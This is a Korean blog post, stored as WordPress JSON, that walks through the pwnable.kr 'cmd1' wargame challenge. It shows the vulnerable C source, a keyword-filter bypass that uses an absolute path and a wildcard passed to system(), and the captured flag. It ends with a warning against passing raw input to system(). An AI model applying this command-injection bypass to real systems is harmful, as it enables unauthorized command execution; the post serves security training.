{"id":247,"date":"2023-06-17T11:42:52","date_gmt":"2023-06-17T02:42:52","guid":{"rendered":"https:\/\/h4ck.kr\/?p=247"},"modified":"2024-05-22T17:08:34","modified_gmt":"2024-05-22T08:08:34","slug":"cmd1","status":"publish","type":"post","link":"https:\/\/h4ck.kr\/?p=247","title":{"rendered":"cmd1"},"content":{"rendered":"\n<div class=\"wp-block-columns is-layout-flex wp-container-core-columns-is-layout-8f761849 wp-block-columns-is-layout-flex\">\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\" style=\"flex-basis:100%\">\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">#include &lt;stdio.h>\n#include &lt;string.h>\n\nint filter(char* cmd){\n\tint r=0;\n\tr += strstr(cmd, \"flag\")!=0;\n\tr += strstr(cmd, \"sh\")!=0;\n\tr += strstr(cmd, \"tmp\")!=0;\n\treturn r;\n}\nint main(int argc, char* argv[], char** envp){\n\tputenv(\"PATH=\/thankyouverymuch\");\n\tif(filter(argv[1])) return 0;\n\tsystem( argv[1] );\n\treturn 0;\n}<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">\ud480\uc774<\/h2>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">putenv(\"PATH=\/thankyouverymuch\");<\/pre>\n<\/div><\/div>\n<\/div>\n<\/div>\n\n\n\n<p class=\"wp-block-paragraph\">PATH\ub77c\ub294 \uc2e4\ud589 \ud30c\uc77c \ud0d0\uc0c9 \uacbd\ub85c\uc778 \ud658\uacbd\ubcc0\uc218\uc5d0 \uc788\ub294 \uac12\uc744 \/thankyouverymuch\ub85c \ubcc0\uacbd\ud55c\ub2e4.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\ub530\ub77c\uc11c \ud504\ub85c\uadf8\ub7a8\uc744 
\uc2e4\ud589\uc2dc\ud0ac\ub54c \uc808\ub300 \uacbd\ub85c\ub85c \ud504\ub85c\uadf8\ub7a8\uc744 \uc2e4\ud589\uc2dc\ucf1c\uc57c \ub420 \uac83\uc774\ub2e4.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<div class=\"wp-block-columns is-layout-flex wp-container-core-columns-is-layout-8f761849 wp-block-columns-is-layout-flex\">\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\" style=\"flex-basis:100%\">\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">int filter(char* cmd){\n\tint r=0;\n\tr += strstr(cmd, \"flag\")!=0;\n\tr += strstr(cmd, \"sh\")!=0;\n\tr += strstr(cmd, \"tmp\")!=0;\n\treturn r;\n}\n...\nif(filter(argv[1])) return 0;<\/pre>\n<\/div><\/div>\n<\/div>\n<\/div>\n\n\n\n<p class=\"wp-block-paragraph\">filter \ud568\uc218\uc5d0 argv[1]\uc774 flag, sh, tmp \uc774 \uc14b\uc911\uc5d0 \ud558\ub098\ub77c\ub3c4 \ud0a4\uc6cc\ub4dc\uac00 \ub4e4\uc5b4\uac08 \uc2dc 0\uc744 \ubc14\ub85c \ubc18\ud658\uc2dc\ucf1c \ud504\ub85c\uadf8\ub7a8\uc744 \uc885\ub8cc\ud574\ubc84\ub9b0\ub2e4.<\/p>\n\n\n\n<div class=\"wp-block-columns is-layout-flex wp-container-core-columns-is-layout-8f761849 wp-block-columns-is-layout-flex\">\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\" style=\"flex-basis:100%\">\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">system( argv[1] 
);<\/pre>\n<\/div><\/div>\n<\/div>\n<\/div>\n\n\n\n<p class=\"wp-block-paragraph\">filter \ud568\uc218\ub97c \ubb34\uc0ac\ud788 \ud1b5\uacfc\ud558\uba74, system \ud568\uc218\ub97c \ud1b5\ud574 \uba85\ub839\uc5b4\ub97c \uc2e4\ud589\uc2dc\ud0ac \uc218 \uc788\uac8c \ub41c\ub2e4.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<div class=\"wp-block-columns is-layout-flex wp-container-core-columns-is-layout-8f761849 wp-block-columns-is-layout-flex\">\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\" style=\"flex-basis:100%\">\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"bat\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">cmd1@pwnable:~$ .\/cmd1 \"\/bin\/cat \/home\/cmd1\/fla*\"\nmommy now I get what PATH environment is for :)<\/pre>\n<\/div><\/div>\n<\/div>\n<\/div>\n\n\n\n<p class=\"wp-block-paragraph\">filter \ud568\uc218\ub294 argv[1] \ubb38\uc790\uc5f4\uc5d0 \ud0a4\uc6cc\ub4dc\uac00 \uc788\ub294\uc9c0\ub9cc \uac80\uc0ac\ud558\uace0, \uc640\uc77c\ub4dc\uce74\ub4dc(*)\ub294 system \ud568\uc218\uac00 \uc2e4\ud589\uc2dc\ud0a8 \uc178\uc5d0\uc11c \ud655\uc7a5\ub41c\ub2e4. \ub530\ub77c\uc11c fla*\ub294 filter \ud568\uc218\ub97c \ud1b5\uacfc\ud55c \ub4a4 \uc178\uc5d0\uc11c \uc2e4\uc81c \ud30c\uc77c \uacbd\ub85c\ub85c \ud655\uc7a5\ub41c\ub2e4. \uc774\ub7f0 \ud0a4\uc6cc\ub4dc \ud544\ud130\ub294 \uc27d\uac8c \uc6b0\ud68c\ub418\ubbc0\ub85c \uc785\ub825\uc744 system \ud568\uc218\uc5d0 \uadf8\ub300\ub85c \ub118\uae30\uc9c0 \uc54a\uc544\uc57c \ud55c\ub2e4.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\ud480\uc774 PATH\ub77c\ub294 \uc2e4\ud589 \ud30c\uc77c \ud0d0\uc0c9 \uacbd\ub85c\uc778 \ud658\uacbd\ubcc0\uc218\uc5d0 \uc788\ub294 \uac12\uc744 \/thankyouverymuch\ub85c \ubcc0\uacbd\ud55c\ub2e4. \ub530\ub77c\uc11c \ud504\ub85c\uadf8\ub7a8\uc744 \uc2e4\ud589\uc2dc\ud0ac\ub54c \uc808\ub300 \uacbd\ub85c\ub85c \ud504\ub85c\uadf8\ub7a8\uc744 \uc2e4\ud589\uc2dc\ucf1c\uc57c \ub420 \uac83\uc774\ub2e4. filter \ud568\uc218\uc5d0 argv[1]\uc774 flag, sh, tmp \uc774 \uc14b\uc911\uc5d0 \ud558\ub098\ub77c\ub3c4 \ud0a4\uc6cc\ub4dc\uac00 \ub4e4\uc5b4\uac08 \uc2dc 0\uc744 \ubc14\ub85c \ubc18\ud658\uc2dc\ucf1c \ud504\ub85c\uadf8\ub7a8\uc744 \uc885\ub8cc\ud574\ubc84\ub9b0\ub2e4. 
filter \ud568\uc218\ub97c \ubb34\uc0ac\ud788 \ud1b5\uacfc\ud558\uba74, system \ud568\uc218\ub97c \ud1b5\ud574 \uba85\ub839\uc5b4\ub97c \uc2e4\ud589\uc2dc\ud0ac \uc218 \uc788\uac8c \ub41c\ub2e4.<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"neve_meta_sidebar":"","neve_meta_container":"","neve_meta_enable_content_width":"","neve_meta_content_width":0,"neve_meta_title_alignment":"","neve_meta_author_avatar":"","neve_post_elements_order":"","neve_meta_disable_header":"","neve_meta_disable_footer":"","neve_meta_disable_title":"","_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[4],"tags":[25],"class_list":["post-247","post","type-post","status-publish","format-standard","hentry","category-pwnable-kr","tag-pwnable"],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/247","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=247"}],"version-history":[{"count":5,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/247\/revisions"}],"predecessor-version":[{"id":295,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/247\/revisions\/295"}],"wp:attachment":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=247"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=247"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Ftag
s&post=247"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}